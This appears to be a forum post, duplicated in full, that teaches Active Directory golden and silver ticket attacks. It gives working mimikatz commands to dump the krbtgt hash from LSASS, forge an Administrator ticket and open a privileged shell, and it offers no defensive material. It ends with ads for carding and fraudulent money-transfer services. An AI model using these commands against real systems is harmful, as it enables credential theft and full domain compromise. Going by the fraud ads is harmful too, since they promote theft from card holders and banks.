KDC Overview
The Key Distribution Center is a service in Active Directory that issues TGT tickets to clients so they can access services with proper authentication and authorization. Just like every service in AD is associated with an account, KRBTGT is a service account for KDC. KRBTGT is a default account and is created during AD installation.
What if we somehow impersonate the KRBTGT account? yes, we will become the KDC and can forge valid TGTs to access any resources on the Active Directory network.
The Golden/Silver Ticket Attack
The golden ticket attacks are post-exploitation attacks. It gives the attacker unrestricted access to the domain. Because the attacker is controlling the KDC which is responsible for issuing Ticket Granting Tickets (TGTs), then she has the golden ticket to access any resource on the domain.
To impersonate the KRBTGT account we need the NTLM hash of krbtgt account and the SID of the domain to which it belongs.
We are going to use mimikatz to dump the password hash and SID (Security Identifier) to generate a golden ticket then will use Pass The Ticket attack to get a privileged session.
The Silver Ticket Attack
Similar to Golden Ticket Attack the key difference is that we forge a TGS ticket for a particular service to access rather than all the resources of the domain. TGS tickets are encrypted with the password hash for the service — therefore, if an attacker steals the hash for a service account they can get TGS tickets for that service to access.
An attacker forges the TGS ticket using the service account password hash. No intermediary TGT (Ticket Granting Ticket) is needed. That means Silver Ticket attacks can be created without any communication with a Domain Controller, making them stealthier.
Golden/Silver Attack in Action
Run mimikatz and use the command below to dump the NTLM hash and SID for creating the golden ticket. To create a silver ticket we need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
The LSA module of mimikatz interacts with the Windows Local Security Authority (LSA) to extract credentials.
/inject — Inject LSASS to extract credentials
/name — account name for target user account
lsadump:lsa — LSA Server to retrieve SAM/AD (database that stores passwords)
Command: lsadump::lsa /inject /name:krbtgt
[Image: 1.png]
The highlighted text is SID of the domain and in the primary section we can see the NTLM hash.
Command: kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:
[Image: 2.png]
kerberos::golden — create golden/silver tickets
/domain — domain name.
/sid — the SID of the domain
/user — username to impersonate
/krbtgt — NTLM password hash for the domain KDC service account (KRBTGT).
/id (optional) — user RID. Mimikatz default is 500
The above command is for creating a golden ticket, to create a silver ticket we can simply put a service NTLM hash into the krbtgt slot, and change the sid of the service account into sid.
Command: misc::cmd
Once the ticket is generated and saved we can use the above command that will open a new cmd with privileges of the given ticket that we just generated which allows us to access resources according to our need.
Credits: Medusa
The Key Distribution Center is a service in Active Directory that issues TGT tickets to clients so they can access services with proper authentication and authorization. Just like every service in AD is associated with an account, KRBTGT is a service account for KDC. KRBTGT is a default account and is created during AD installation.
What if we somehow impersonate the KRBTGT account? yes, we will become the KDC and can forge valid TGTs to access any resources on the Active Directory network.
The Golden/Silver Ticket Attack
The golden ticket attacks are post-exploitation attacks. It gives the attacker unrestricted access to the domain. Because the attacker is controlling the KDC which is responsible for issuing Ticket Granting Tickets (TGTs), then she has the golden ticket to access any resource on the domain.
To impersonate the KRBTGT account we need the NTLM hash of krbtgt account and the SID of the domain to which it belongs.
We are going to use mimikatz to dump the password hash and SID (Security Identifier) to generate a golden ticket then will use Pass The Ticket attack to get a privileged session.
The Silver Ticket Attack
Similar to Golden Ticket Attack the key difference is that we forge a TGS ticket for a particular service to access rather than all the resources of the domain. TGS tickets are encrypted with the password hash for the service — therefore, if an attacker steals the hash for a service account they can get TGS tickets for that service to access.
An attacker forges the TGS ticket using the service account password hash. No intermediary TGT (Ticket Granting Ticket) is needed. That means Silver Ticket attacks can be created without any communication with a Domain Controller, making them stealthier.
Golden/Silver Attack in Action
Run mimikatz and use the command below to dump the NTLM hash and SID for creating the golden ticket. To create a silver ticket we need to change the /name: to dump the hash of either a domain admin account or a service account such as the SQLService account.
The LSA module of mimikatz interacts with the Windows Local Security Authority (LSA) to extract credentials.
/inject — Inject LSASS to extract credentials
/name — account name for target user account
lsadump:lsa — LSA Server to retrieve SAM/AD (database that stores passwords)
Command: lsadump::lsa /inject /name:krbtgt
[Image: 1.png]
The highlighted text is SID of the domain and in the primary section we can see the NTLM hash.
Command: kerberos::golden /user:Administrator /domain:controller.local /sid: /krbtgt: /id:
[Image: 2.png]
kerberos::golden — create golden/silver tickets
/domain — domain name.
/sid — the SID of the domain
/user — username to impersonate
/krbtgt — NTLM password hash for the domain KDC service account (KRBTGT).
/id (optional) — user RID. Mimikatz default is 500
The above command is for creating a golden ticket, to create a silver ticket we can simply put a service NTLM hash into the krbtgt slot, and change the sid of the service account into sid.
Command: misc::cmd
Once the ticket is generated and saved we can use the above command that will open a new cmd with privileges of the given ticket that we just generated which allows us to access resources according to our need.
Credits: Medusa
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding